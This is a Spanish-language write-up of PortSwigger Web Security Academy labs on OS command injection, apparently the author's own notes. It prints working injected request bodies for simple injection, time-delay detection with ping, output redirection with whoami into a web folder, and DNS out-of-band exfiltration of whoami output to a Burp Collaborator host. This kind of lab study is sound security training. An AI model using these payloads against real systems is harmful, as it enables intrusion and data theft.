Os Command Injection

Executing arbitrary commands

Lab 1: OS command injection, simple case

Entramos a algún producto y usamos el boton check stock pero esto lo haremos usando burp suite interceptando la consulta. command1.1.png

Lo mandamos al repeater donde podremos modificarlo y enviar el paquete. Usaremos la siguiente consulta:

productId=2&storeId=1 ; id

command1.2.png

Blind OS command injection vulnerabilities

Detecting blind OS command injection using time delays

Lab 2: Blind OS command injection with time delays

Interceptamos el envío del feedback con Burp suite.

command3.1.png

Probamos en los parametros en cual funciona agregarle ||ping+-c+10+127.0.0.1||, el que funciona es el parametro email.

...
csrf=AH3gDeLKQ9z9wuUelG8ExXglulKqw6Bt&name=Gatoto&email=gato@gmail.com||ping+-c+10+127.0.0.1||&subject=adfsad&message=asdfasd

El resultado debería demorar por lo menos 10 segundos.

Exploiting blind OS command injection by redirecting output

Lab 4: Blind OS command injection with output redirection

Interceptamos el paquete al enviar el feedback como el laboratorio anterior pero esta vez enviamos el resultado a la carpeta /var/www/images. Guardaremos la respuesta en un txt.

...
csrf=v8X6Ld2i21GljQMqjB9CKjDzrCqpSrhO&name=asdfasd&email=gato%40gmail.com||whoami>/var/www/images/miau.txt||&subject=asdas&message=asdasd

Ahora podremos ver el resultado en https://acad1f931ec1c55bc03570a8007f0058.web-security-academy.net/image?filename=miau.txt.

Exploiting blind OS command injection using out-of-band (OAST) techniques

Lab 5: Blind OS command injection with out-of-band interaction

Interceptamos la consulta igual que los anteriores laboratorios.

Usaremos el Burp Collaborator Client para recepcionar las consultas externas.

command5.1.png

Presionamos la opción de copy to clipboard, en nuestro caso nos copio la dirección 5x3n5ni2nt8kgaozaa78zab4mvsmgb.burpcollaborator.net.

...
csrf=S1bia6kmPluBfw6osSYf7l0Q4ieyFGDt&name=asdf&email=gato%40gmail.com||nslookup+5x3n5ni2nt8kgaozaa78zab4mvsmgb.burpcollaborator.net||&subject=asdfsdf&message=asdfsad

Obtenemos los resultados en el burp collaborator.

command5.2.png

Lab 6: Blind OS command injection with out-of-band data exfiltration

...
csrf=j0THGLFofHZKTMBkm5YE3ZTfkaTTSiQT&name=asdfas&email=gato%40gmail.com||nslookup+`whoami`.zsv3zamskchm3cmvtmioea5h187yvn.burpcollaborator.net||&subject=asdfasdf&message=asdfasd

command6.1.png